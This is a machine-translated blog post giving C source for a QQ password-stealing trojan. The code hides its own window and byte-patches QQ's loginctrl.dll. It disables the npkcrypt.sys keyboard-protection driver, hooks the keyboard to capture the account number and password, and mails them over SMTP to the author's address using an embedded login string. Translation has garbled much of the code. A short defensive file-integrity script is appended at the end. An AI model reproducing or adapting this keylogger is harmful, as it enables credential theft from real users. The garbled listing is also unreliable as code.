Simple implementation of QQ Trojan, core programming of QQ account theft ....

Source: Internet
Author: User

The dormitory is finished and cannot access the Internet. This is quite depressing ....

Ah .... Now in the data center, write a post:

A sample source code about how to program QQ Trojan

Haha, I was at home over the holidays, looking at data structures and C++ .... When I was bored, I thought of my earlier QQ-related things!

I still remember that I wrote some posts about a preliminary QQ account-stealing program (this is the only level I am at --#). I tidied it up over this holiday. Let's go through the four major parts of the program:

1. Search for the QQ directory. This is a crucial step and the foundation for cracking the keyboard protection. At first, I searched by recursing through the directories of the entire hard disk, but that was too slow. 0_0! Later, I changed it to take the directory from the running QQ process. Of course, in this case you can only test it while QQ is running. Otherwise, you have to set the QQ installation path in the source code.

2. Crack the keyboard protection. I have written about it before. I don't want to go over it again ....

3. Hook the keyboard. I remember writing an article on the Win32 hook mechanism in the first semester of my freshman year. At that time, QQ was also the experimental object ^_^! However, the method used then was too troublesome and used a self-written .dll. Later I found that inconvenient, and since I was writing a console program in C (combined with the Win32 API), I could define the console handler myself .... For details, see the source code --!

4. Send mail. This is the last and most critical step! Unfortunately, my technique is not up to it. I use the SMTP protocol for sending. This will be discovered by the firewall .... Ah ....

That is the end of the introduction. The following is the source code:

/* File name: QQ keyboard recorder. c
* Purpose: to study the surface of QQ key-hitting Trojans
* Completion date: 2006.8 ver 0.01
* Authors: 88250
* Contact: E-mail: DL88250@gmail.com/QQ: 845765
*/
# DEFINE _ win32_winnt 0x0400
# I nclude <Io. h>
# I nclude <stdio. h>
# I nclude <stdlib. h>
# I nclude <windows. h>
# I nclude <tlhelp32.h>
# I nclude <psapi. h>

# Define user_id 0x0000008a
# Define psw_id 0x000000b4

# Pragma comment (Lib, "psapi. lib ")
# Pragma comment (Lib, "user32.lib ")
# Pragma comment (Lib, "ws2_32.lib ")

Char sdirpath [255] = "C: // program files // QQ ";
Char suser [255] = {'U','s ', 'E', 'R ',':',''};
Char spsw [255] = {'.', 'P','s ', 'w', 'D ',':',''};
Char maildata [255] = "from:/" dl88250/"<dl82850@126.com>/R/N"
"Subject :";
Int npsw = 7;
Hwnd hlogin = NULL, huser = NULL, hpsw = NULL, hwnd = NULL;
Hwnd hself = NULL;
DWORD g_tid = 0;/* Current thread ID */
Hhook g_hook = NULL;/* keyboard hook handle */

Int killprocess (char * C1, char * C2)
{
Int nsecflag = 0;/* mark of successful shutdown */
Handle handle = NULL;
Processentry32 * info = NULL;/* process snapshot structure */
Handle = createconlhelp32snapshot (th32cs_snapprocess, 0 );
Info = (processentry32 *) malloc (sizeof (processentry32 ));
Info-> dwsize = sizeof (processentry32 );
Process32first (handle, Info );
/* Start to enumerate the current process */
While (process32next (handle, Info )! = False ){
Info-> szexefile;
If (0 = strcmp (C1, info-> szexefile) | (0 = strcmp (C2, info-> szexefile ))){
Hwnd = (hwnd) OpenProcess (process_terminate, false, info-> th32processid );
Terminateprocess (hwnd, 0);/* end */
Nsecflag = 1;
}
}
Closehandle (handle );
If (1 = nsecflag ){
Return 1;
} Else {
Return 0;/* end failed */
}
}

Void Sendmail (void)
{
Wsadata;
Word wversionrequested = makeword (2, 2 );
Struct hostent * phostent = NULL;
Socket server = invalid_socket;
Struct sockaddr_in service;

Char buffer [1024] = {0 };
Wsastartup (wversionrequested, & wsadata );
Server = socket (af_inet, sock_stream, ipproto_tcp );
Phostent = gethostbyname ("smtp.126.com ");
Service. sin_family = af_inet;
Memcpy (& service. sin_addr.s_addr, phostent-> h_addr_list [0], phostent-> h_length );
Service. sin_port = htons (25 );
Connect (server, (struct sockaddr *) & service, sizeof (Service ));
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "HELO server.../R/N", strlen ("HELO server.../R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "auth login/R/N", strlen ("auth login/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "bgjlew9uzdrrb21h/R/N", strlen ("bgjlew9uzdrrb21h/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "bgjlew9uzdrrb21h/R/N", strlen ("bgjlew9uzdrrb21h/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "mail from: <lbeyond4koma@126.com>/R/N", strlen ("mail from: <lbeyond4koma@126.com>/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "rcpt to: <dl88250@gmail.com>/R/N", strlen ("rcpt to: <dl88250@gmail.com>/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "Data/R/N", strlen ("Data/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, maildata, strlen (maildata), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "Quit/R/N", strlen ("Quit/R/N"), 0 );
Wsacleanup ();
Printf ("success! ");
Exitprocess (0 );
Return;
}
/* Process the intercepted accounts and passwords and integrate them into the subject of the email */
Void dealwith (void)
{
Strcat (maildata, suser );
Strcat (maildata, spsw );
Strcat (maildata, "/R/n./R/N ");
Printf ("% s", maildata );
Sendmail ();
Return;
}
/* Enumerate the subwindow and find the QQ number and password control handle */
Bool callback enumchildwndproc (hwnd, lparam)
{
Long id = getwindowlong (hwnd, gwl_id );
If (! Hwnd ){
Return false;
}
If (ID = user_id ){
Huser = hwnd;
} Else if (ID = psw_id ){
Hpsw = hwnd;
}
Return true;
}

/* Define the console handler function to exit the current thread for hook */
Bool callback con_handler (DWORD g_tid)
{
Postthreadmessage (g_tid, wm_quit, 0, 0 );
Return true;
}
/* Analyze the keyboard buttons. The case sensitivity is not determined here.
* You can only press Enter when logging on ....
*/
Lresult callback kb_proc (INT code, wparam, lparam)
{
Pkbdllhookstruct P = (pkbdllhookstruct) lparam;
If (wparam = wm_keydown & P-> vkcode = vk_return & lparam> 0 ){
Sendmessage (huser, wm_gettext, 20, (lparam) (suser + 6 ));
Unhookwindowshookex (g_hook );
Dealwith ();/* start to process intercepted data */
}
If (wparam = wm_keydown) & (P-> vkcode> 47) & (p-> vkcode <58 ))){
Spsw [npsw] = p-> vkcode;
Npsw ++;
Goto next;
}
If (wparam = wm_keydown) & (P-> vkcode> 64) & (p-> vkcode <91 ))){
Spsw [npsw] = p-> vkcode + 32;
Npsw ++;
Goto next;
}
If (wparam = wm_keydown) & (getkeystate (vk_capital) & 1) | (getkeystate (vk_shift) & 1 )))
& (P-> vkcode> 64) & (p-> vkcode <91 )))){
Spsw [npsw] = p-> vkcode;
Npsw ++;
Goto next;
}
Next:
Return callnexthookex (g_hook, code, wparam, lparam );
}

/* Find the desired handle and start the hook */
Void start (void)
{
MSG;
If (hlogin = findwindow ("#32770", "QQ User Logon ")){
Enumchildwindows (hlogin, enumchildwndproc, 0 );
If (huser! = NULL ){
G_tid = getcurrentthreadid ();
Setconsolectrlhandler (& con_handler, true );
G_hook = setwindowshookex (wh_keyboard_ll, & kb_proc, getmodulehandle (null), 0 );
While (getmessage (& MSG, null, 0, 0 )){
Translatemessage (& MSG );
Dispatchmessage (& MSG );
}
}
}
Return;
}
/* Click "QQ: // loginctrl. dll" and "npkcrypt. sys" ^ to crack the keyboard */
Void crack (void)
{
Char crack [1];
Char slcpath [255];
Char snpkcrypt [255], snpkcryptdl [255];
File * f = NULL;
Strcpy (slcpath, sdirpath );
Strcpy (snpkcrypt, sdirpath );
Strcat (snpkcrypt, "// npkcrypt. sys ");
Strcpy (snpkcryptdl, sdirpath );
Strcat (snpkcryptdl, "// npkcrypt. DL ");
Rename (snpkcrypt, snpkcryptdl );
F = fopen (strcat (slcpath, "// loginctrl. dll"), "RB + ");
If (F = NULL ){
Return;
}
Fseek (F, 63921, seek_set );
Crack [0] = 115; // 116-> 115
Fwrite (crack, sizeof (char), 1, F );
Fseek (F, 64105, seek_set );
Crack [0] = 193; // 194-> 193
Fwrite (crack, sizeof (char), 1, F );
Fseek (F, 64135, seek_set );
Crack [0] = 158; // 159-> 158
Fwrite (crack, sizeof (char), 1, F );

Fclose (f );

Return;
}

Int main (void)
{
DWORD processid [1024], pbytesreturned [1024], processsum, I;
Handle hprocess;
Hmodule;
Char path [max_path] = "";
Hself = findwindow ("lelewindowclass", null);/* handle of the Program */
/* Implement its own pseudo-hide */
Setwindowlong (hself, gwl_exstyle, ws_ex_toolwindow );
Setwindowpos (hself, hwnd_bottom, 0, 0, 0, 0, swp_hidewindow );
/* Enumerate the current process, locate the QQ process, and disable it */
Enumprocesses (processid, sizeof (processid), pbytesreturned );
Processsum = * pbytesreturned/sizeof (DWORD );
For (I = 0; I <processsum; I ++ ){
Hprocess = OpenProcess (process_query_information | process_vm_read, false, processid [I]);
If (hprocess ){
Enumprocessmodules (hprocess, & hmodule, sizeof (hmodule), pbytesreturned );
Getmodulefilenameex (hprocess, hmodule, path, sizeof (PATH ));
Getmediapathname (path, path, 256 );
If (strstr (path, "qq.exe") | strstr (path, "QQ. EXE ")){
Strcpy (sdirpath, PATH );
}
}
}
Closehandle (hprocess );
Closehandle (hmodule );
* (Sdirpath + (strlen (sdirpath)-6) = '/0 ';
For (I = strlen (sdirpath); I> 1; I --){
Sdirpath [I + 1] = sdirpath [I];

}
Sdirpath [++ I] = '//';
Crack ();
Start ();
Sleep (5000 );
If (1 = killprocess ("QQ. EXE", "qq.exe ")){
Crack ();
Strcpy (path, sdirpath );
Strcat (path, "// qq.exe ");
Winexec (path, sw_show );
}
Crack ();
While (true ){
Sleep (8);/* reduce CPU usage */
Start ();
}
}

I declare again that this thing is still dangerous --! This is only a technical exchange. Don't confuse it .... : =. =!

Haha .... Okay, I have finished. ^
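Seen from the defender's side, the crack step in the listing leaves two on-disk artifacts: `npkcrypt.sys` is renamed away and bytes inside `loginctrl.dll` are changed. The following is an added example, not part of the original post, that audits an installation directory against a known-good SHA-256 manifest; the manifest layout, the function names and the stand-in file contents are assumptions constructed for illustration.

```python
import hashlib
import os
import tempfile

def sha256_file(path, chunk=65536):
    """Stream a file through SHA-256 so large binaries are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def build_manifest(install_dir, names):
    """Record known-good hashes for the protected files (run on a clean install)."""
    return {n: sha256_file(os.path.join(install_dir, n)) for n in names}

def audit(install_dir, manifest):
    """Return (file, finding) for each protected file that is missing
    (for example renamed away) or whose content no longer matches."""
    findings = []
    for name, good in sorted(manifest.items()):
        path = os.path.join(install_dir, name)
        if not os.path.isfile(path):
            findings.append((name, "missing"))
        elif sha256_file(path) != good:
            findings.append((name, "modified"))
    return findings

def demo():
    """Constructed sample: two stand-in files, audited before and after tampering."""
    with tempfile.TemporaryDirectory() as d:
        samples = (("loginctrl.dll", b"\x00" * 4096), ("npkcrypt.sys", b"\x01" * 512))
        for name, data in samples:
            with open(os.path.join(d, name), "wb") as f:
                f.write(data)
        manifest = build_manifest(d, [name for name, _ in samples])
        clean = audit(d, manifest)
        # Constructed tampering: one changed byte and one renamed driver file.
        with open(os.path.join(d, "loginctrl.dll"), "r+b") as f:
            f.seek(100)
            f.write(b"\x73")
        os.rename(os.path.join(d, "npkcrypt.sys"), os.path.join(d, "npkcrypt.bak"))
        return clean, audit(d, manifest)

if __name__ == "__main__":
    print(demo())
```

A single changed byte is enough to alter the hash, so the audit flags the patched file without needing to know which offsets were touched.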
 
